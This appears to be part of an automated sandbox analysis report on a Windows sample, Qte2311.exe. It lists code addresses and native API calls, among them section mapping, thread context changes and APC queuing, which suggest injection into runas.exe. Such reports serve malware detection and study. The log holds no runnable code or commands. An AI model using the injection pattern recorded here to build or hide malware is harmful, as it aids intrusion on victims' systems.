Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F2F30 3_2_018F2F30
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C4F40 3_2_018C4F40
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190CE93 3_2_0190CE93
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01862E90 3_2_01862E90
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190EEDB 3_2_0190EEDB
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190EE26 3_2_0190EE26
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01850E59 3_2_01850E59
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185B1B0 3_2_0185B1B0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0188516C 3_2_0188516C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183F172 3_2_0183F172
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0191B16B 3_2_0191B16B
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018FF0CC 3_2_018FF0CC
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018570C0 3_2_018570C0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190F0E0 3_2_0190F0E0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019070E9 3_2_019070E9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0189739A 3_2_0189739A
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190132D 3_2_0190132D
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183D34C 3_2_0183D34C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018552A0 3_2_018552A0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186B2C0 3_2_0186B2C0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F12ED 3_2_018F12ED
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186D2F0 3_2_0186D2F0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018ED5B0 3_2_018ED5B0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019195C3 3_2_019195C3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01907571 3_2_01907571
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190F43F 3_2_0190F43F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01841460 3_2_01841460
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190F7B0 3_2_0190F7B0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019016CC 3_2_019016CC
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01895630 3_2_01895630
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E5910 3_2_018E5910
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01859950 3_2_01859950
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186B950 3_2_0186B950
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018538E0 3_2_018538E0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018BD800 3_2_018BD800
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186FB80 3_2_0186FB80
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0188DBF9 3_2_0188DBF9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C5BF0 3_2_018C5BF0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190FB76 3_2_0190FB76
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EDAAC 3_2_018EDAAC
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01895AA0 3_2_01895AA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F1AA3 3_2_018F1AA3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018FDAC6 3_2_018FDAC6
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01907A46 3_2_01907A46
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190FA49 3_2_0190FA49
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C3A6C 3_2_018C3A6C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186FDC0 3_2_0186FDC0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01853D40 3_2_01853D40
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01901D5A 3_2_01901D5A
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01907D73 3_2_01907D73
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190FCF2 3_2_0190FCF2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C9C32 3_2_018C9C32
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01851F92 3_2_01851F92
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190FFB1 3_2_0190FFB1
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01813FD2 3_2_01813FD2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01813FD5 3_2_01813FD5
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190FF09 3_2_0190FF09
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01859EB0 3_2_01859EB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B0535 5_2_050B0535
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05170591 5_2_05170591
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05154420 5_2_05154420
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05162446 5_2_05162446
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0515E4F6 5_2_0515E4F6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050D4750 5_2_050D4750
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B0770 5_2_050B0770
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050AC7C0 5_2_050AC7C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CC6E0 5_2_050CC6E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050A0100 5_2_050A0100
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0514A118 5_2_0514A118
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05138158 5_2_05138158
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051641A2 5_2_051641A2
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051701AA 5_2_051701AA
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051681CC 5_2_051681CC
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05142000 5_2_05142000
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516A352 5_2_0516A352
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051703E6 5_2_051703E6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050BE3F0 5_2_050BE3F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05150274 5_2_05150274
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051302C0 5_2_051302C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050BAD00 5_2_050BAD00
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0514CD1F 5_2_0514CD1F
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050C8DBF 5_2_050C8DBF
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050AADE0 5_2_050AADE0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B0C00 5_2_050B0C00
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05150CB5 5_2_05150CB5
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050A0CF2 5_2_050A0CF2
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05152F30 5_2_05152F30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050F2F28 5_2_050F2F28
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050D0F30 5_2_050D0F30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05124F40 5_2_05124F40
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0512EFA0 5_2_0512EFA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050A2FC8 5_2_050A2FC8
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516EE26 5_2_0516EE26
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B0E59 5_2_050B0E59
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516CE93 5_2_0516CE93
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050C2E90 5_2_050C2E90
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516EEDB 5_2_0516EEDB
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050C6962 5_2_050C6962
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B29A0 5_2_050B29A0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0517A9A6 5_2_0517A9A6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050BA840 5_2_050BA840
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B2840 5_2_050B2840
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050968B8 5_2_050968B8
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050DE8F0 5_2_050DE8F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516AB40 5_2_0516AB40
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05166BD7 5_2_05166BD7
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050AEA80 5_2_050AEA80
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05167571 5_2_05167571
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0514D5B0 5_2_0514D5B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051795C3 5_2_051795C3
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516F43F 5_2_0516F43F
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050A1460 5_2_050A1460
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516F7B0 5_2_0516F7B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050F5630 5_2_050F5630
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051616CC 5_2_051616CC
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E516C 5_2_050E516C
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0509F172 5_2_0509F172
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0517B16B 5_2_0517B16B
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050BB1B0 5_2_050BB1B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B70C0 5_2_050B70C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0515F0CC 5_2_0515F0CC
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516F0E0 5_2_0516F0E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051670E9 5_2_051670E9
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516132D 5_2_0516132D
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0509D34C 5_2_0509D34C
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050F739A 5_2_050F739A
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B52A0 5_2_050B52A0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CB2C0 5_2_050CB2C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_051512ED 5_2_051512ED
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CD2F0 5_2_050CD2F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B3D40 5_2_050B3D40
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05161D5A 5_2_05161D5A
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05167D73 5_2_05167D73
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CFDC0 5_2_050CFDC0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05129C32 5_2_05129C32
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516FCF2 5_2_0516FCF2
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516FF09 5_2_0516FF09
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B1F92 5_2_050B1F92
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516FFB1 5_2_0516FFB1
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05073FD5 5_2_05073FD5
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05073FD2 5_2_05073FD2
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B9EB0 5_2_050B9EB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05145910 5_2_05145910
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B9950 5_2_050B9950
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CB950 5_2_050CB950
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0511D800 5_2_0511D800
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050B38E0 5_2_050B38E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516FB76 5_2_0516FB76
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050CFB80 5_2_050CFB80
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05125BF0 5_2_05125BF0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050EDBF9 5_2_050EDBF9
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05167A46 5_2_05167A46
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0516FA49 5_2_0516FA49
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05123A6C 5_2_05123A6C
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050F5AA0 5_2_050F5AA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_05151AA3 5_2_05151AA3
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0514DAAC 5_2_0514DAAC
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0515DAC6 5_2_0515DAC6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA13F0 5_2_02FA13F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9C670 5_2_02F9C670
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9C668 5_2_02F9C668
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9AA54 5_2_02F9AA54
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA2B40 5_2_02FA2B40
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA2B3B 5_2_02FA2B3B
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9C890 5_2_02F9C890
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9A910 5_2_02F9A910
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB6C30 5_2_02FB6C30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F91115 5_2_02F91115
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA1B79 5_2_02FA1B79
Source: C:\Windows\SysWOW64\runas.exe Code function: String function: 0509B970 appears 262 times
Source: C:\Windows\SysWOW64\runas.exe Code function: String function: 050E5130 appears 58 times
Source: C:\Windows\SysWOW64\runas.exe Code function: String function: 0511EA12 appears 86 times
Source: C:\Windows\SysWOW64\runas.exe Code function: String function: 0512F290 appears 103 times
Source: C:\Windows\SysWOW64\runas.exe Code function: String function: 050F7E54 appears 107 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: String function: 018CF290 appears 103 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: String function: 01885130 appears 58 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: String function: 018BEA12 appears 86 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: String function: 0183B970 appears 262 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: String function: 01897E54 appears 107 times
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040A023 NtSuspendThread, 3_2_0040A023
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004280C3 NtClose, 3_2_004280C3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040B0A3 NtReadFile, 3_2_0040B0A3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040B923 NtAllocateVirtualMemory, 3_2_0040B923
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040A223 NtGetContextThread, 3_2_0040A223
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040AA33 NtCreateSection, 3_2_0040AA33
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040AC53 NtMapViewOfSection, 3_2_0040AC53
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040A423 NtSetContextThread, 3_2_0040A423
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040B513 NtDelayExecution, 3_2_0040B513
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040AE73 NtCreateFile, 3_2_0040AE73
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040A623 NtResumeThread, 3_2_0040A623
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882B60 NtClose,LdrInitializeThunk, 3_2_01882B60
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_01882DF0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_01882C70
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018835C0 NtCreateMutant,LdrInitializeThunk, 3_2_018835C0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01884340 NtSetContextThread, 3_2_01884340
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01884650 NtSuspendThread, 3_2_01884650
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882B80 NtQueryInformationFile, 3_2_01882B80
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882BA0 NtEnumerateValueKey, 3_2_01882BA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882BE0 NtQueryValueKey, 3_2_01882BE0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882BF0 NtAllocateVirtualMemory, 3_2_01882BF0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882AB0 NtWaitForSingleObject, 3_2_01882AB0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882AD0 NtReadFile, 3_2_01882AD0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882AF0 NtWriteFile, 3_2_01882AF0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882DB0 NtEnumerateKey, 3_2_01882DB0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882DD0 NtDelayExecution, 3_2_01882DD0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882D00 NtSetInformationFile, 3_2_01882D00
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882D10 NtMapViewOfSection, 3_2_01882D10
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882D30 NtUnmapViewOfSection, 3_2_01882D30
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882CA0 NtQueryInformationToken, 3_2_01882CA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882CC0 NtQueryVirtualMemory, 3_2_01882CC0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882CF0 NtOpenProcess, 3_2_01882CF0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882C00 NtQueryInformationProcess, 3_2_01882C00
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882C60 NtCreateKey, 3_2_01882C60
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882F90 NtProtectVirtualMemory, 3_2_01882F90
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882FA0 NtQuerySection, 3_2_01882FA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882FB0 NtResumeThread, 3_2_01882FB0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882FE0 NtCreateFile, 3_2_01882FE0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882F30 NtCreateSection, 3_2_01882F30
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882F60 NtCreateProcessEx, 3_2_01882F60
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882E80 NtReadVirtualMemory, 3_2_01882E80
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882EA0 NtAdjustPrivilegesToken, 3_2_01882EA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882EE0 NtQueueApcThread, 3_2_01882EE0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01882E30 NtWriteVirtualMemory, 3_2_01882E30
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01883090 NtSetValueKey, 3_2_01883090
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01883010 NtOpenDirectoryObject, 3_2_01883010
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018839B0 NtGetContextThread, 3_2_018839B0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01883D10 NtOpenProcessToken, 3_2_01883D10
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01883D70 NtOpenThread, 3_2_01883D70
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E4650 NtSuspendThread,LdrInitializeThunk, 5_2_050E4650
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E4340 NtSetContextThread,LdrInitializeThunk, 5_2_050E4340
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_050E2D10
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_050E2D30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2DD0 NtDelayExecution,LdrInitializeThunk, 5_2_050E2DD0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_050E2DF0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2C60 NtCreateKey,LdrInitializeThunk, 5_2_050E2C60
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_050E2C70
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_050E2CA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2F30 NtCreateSection,LdrInitializeThunk, 5_2_050E2F30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2FB0 NtResumeThread,LdrInitializeThunk, 5_2_050E2FB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2FE0 NtCreateFile,LdrInitializeThunk, 5_2_050E2FE0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_050E2E80
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2EE0 NtQueueApcThread,LdrInitializeThunk, 5_2_050E2EE0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2B60 NtClose,LdrInitializeThunk, 5_2_050E2B60
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2BA0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_050E2BA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_050E2BE0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_050E2BF0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2AD0 NtReadFile,LdrInitializeThunk, 5_2_050E2AD0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2AF0 NtWriteFile,LdrInitializeThunk, 5_2_050E2AF0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E35C0 NtCreateMutant,LdrInitializeThunk, 5_2_050E35C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E39B0 NtGetContextThread,LdrInitializeThunk, 5_2_050E39B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2D00 NtSetInformationFile, 5_2_050E2D00
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2DB0 NtEnumerateKey, 5_2_050E2DB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2C00 NtQueryInformationProcess, 5_2_050E2C00
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2CC0 NtQueryVirtualMemory, 5_2_050E2CC0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2CF0 NtOpenProcess, 5_2_050E2CF0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2F60 NtCreateProcessEx, 5_2_050E2F60
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2F90 NtProtectVirtualMemory, 5_2_050E2F90
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2FA0 NtQuerySection, 5_2_050E2FA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2E30 NtWriteVirtualMemory, 5_2_050E2E30
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2EA0 NtAdjustPrivilegesToken, 5_2_050E2EA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2B80 NtQueryInformationFile, 5_2_050E2B80
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E2AB0 NtWaitForSingleObject, 5_2_050E2AB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E3010 NtOpenDirectoryObject, 5_2_050E3010
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E3090 NtSetValueKey, 5_2_050E3090
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E3D10 NtOpenProcessToken, 5_2_050E3D10
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050E3D70 NtOpenThread, 5_2_050E3D70
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB46A0 NtCreateFile, 5_2_02FB46A0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB47C0 NtReadFile, 5_2_02FB47C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB4A00 NtAllocateVirtualMemory, 5_2_02FB4A00
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB48E0 NtClose, 5_2_02FB48E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB4870 NtDeleteFile, 5_2_02FB4870
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB48DD NtClose, 5_2_02FB48DD
Source: Qte2311.exe, 00000000.00000002.1662192785.00000000046FE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Qte2311.exe
Source: Qte2311.exe, 00000000.00000002.1664028645.0000000007F90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Qte2311.exe
Source: Qte2311.exe, 00000000.00000002.1660974972.00000000015CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Qte2311.exe
Source: Qte2311.exe, 00000003.00000002.1744906371.000000000193D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Qte2311.exe
Source: Qte2311.exe, 00000003.00000002.1744564742.00000000013B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRUNAS.EXEj% vs Qte2311.exe
Source: Qte2311.exe Binary or memory string: OriginalFilenamercQ.exe> vs Qte2311.exe
Source: Qte2311.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Qte2311.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Qte2311.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Qte2311.exe C:\Users\user\Desktop\Qte2311.exe
